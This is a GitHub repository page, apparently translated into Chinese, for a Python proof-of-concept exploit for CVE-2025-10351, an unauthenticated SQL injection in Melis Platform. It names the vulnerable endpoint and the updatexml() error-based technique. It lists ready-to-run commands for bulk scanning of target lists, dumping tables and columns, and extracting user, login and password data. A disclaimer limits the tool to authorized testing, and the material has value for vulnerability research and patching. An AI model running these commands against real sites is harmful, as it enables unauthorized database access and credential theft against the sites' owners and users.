ivansmc/CVE-2025-10351-POC

GitHub: ivansmc/CVE-2025-10351-POC

针对 Melis Platform 框架 CVE-2025-10351 未授权 SQL 注入漏洞的自动化 PoC 利用工具,支持数据提取与批量检测。

Stars: 1 | Forks: 0

# CVE-2025-10351 POC - SQL 注入漏洞利用 💉 ![status](https://img.shields.io/badge/status-fully%20working-brightgreen) ![python](https://img.shields.io/badge/python-3.8%2B-blue) ![status](https://img.shields.io/badge/status-proof%20of%20concept-orange) ## 🔗 参考文献 - 📄 [MITRE 上的 CVE-2025-10351](https://www.cve.org/CVERecord?id=CVE-2025-10351) - 📄 [INCIBE(西班牙国家网络安全研究所)关于 Melis 平台的警告](https://www.incibe.es/incibe-cert/alerta-temprana/avisos/multiples-vulnerabilidades-en-melis-platform) ## 🚀 描述 此 POC 针对以下端点中的**未经身份验证的基于错误的 SQL 注入**漏洞: ``` melis/MelisCms/PageEdition/getTinyTemplates?idPage= ``` 它利用 MySQL 中的 `updatexml()` 来提取: - 表名 - 列名 - 来自特定或所有列的数据 它还可以检测可能的**基于时间的 SQLi** 向量,以便进行进一步的手动利用。 ## 🛠️ 环境要求 使用以下命令安装依赖项: ``` pip3 install -r requirements.txt ``` ## 🧪 使用方法 ### 基础检测 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 ``` ### 通过 URL 列表运行 ``` python3 CVE-2025-10351-POC.py -l targets.txt ``` ### 提取所有表名 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -at ``` ### 从表中提取所有列名 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users ``` ### 提取所有列中的所有数据 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -ac ``` ### 提取特定列 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password ``` ### 使用不安全模式的代理、Cookie 及调试模式 ``` python3 CVE-2025-10351-POC.py -u http://target.com -p 80 -t users -c user,login,password --proxy http://127.0.0.1:8080 --insecure --cookies 2prkpe1h72nd4fhmlum65okc04 --debug ``` ## ⚙️ 选项 | 参数 | 描述 | |--------------|-----------------------------------------| | `-u` | 目标 URL | | `-p` | 端口 (80, 443 等) | | `-l` | 包含 URL 列表的文件 | | `-s` | 基于时间的测试的休眠时间 (默认: 1s) | | `-at` | 导出所有表名 | | `-t` | 指定表名 | | `-ac` | 导出给定表的所有列 | | `-c` | 要导出的以逗号分隔的列列表 | | `--proxy` | Burp 代理 http://127.0.0.1:8080 | | `--insecure` | 在使用代理连接时禁用 TLS 检查 | | `--cookie` | 用于身份验证请求的 Cookie | | `--debug` | 调试模式 | ## 📤 输出 - 提取的表将保存到 `tables_extracted.txt` - 提取的数据将保存到 `_data.txt` ## ⚠️ 免责声明 本文档仅供授权的安全测试和修复使用。请**不要**对您不拥有或未获得明确测试许可的系统使用此 PoC 或复现步骤。作者对任何滥用行为不承担责任。 Made with ❤️ by Manuel Iván San Martín Castillo
标签:CISA项目, CVE-2025-10351, EXP, INCIBE, Maven, Melis Platform, POC, Python, updatexml, Web安全, 报错注入, 数据展示, 数据库攻击, 无后门, 时间盲注, 未授权访问, 概念验证, 漏洞验证, 红队, 网络安全, 蓝队分析, 隐私保护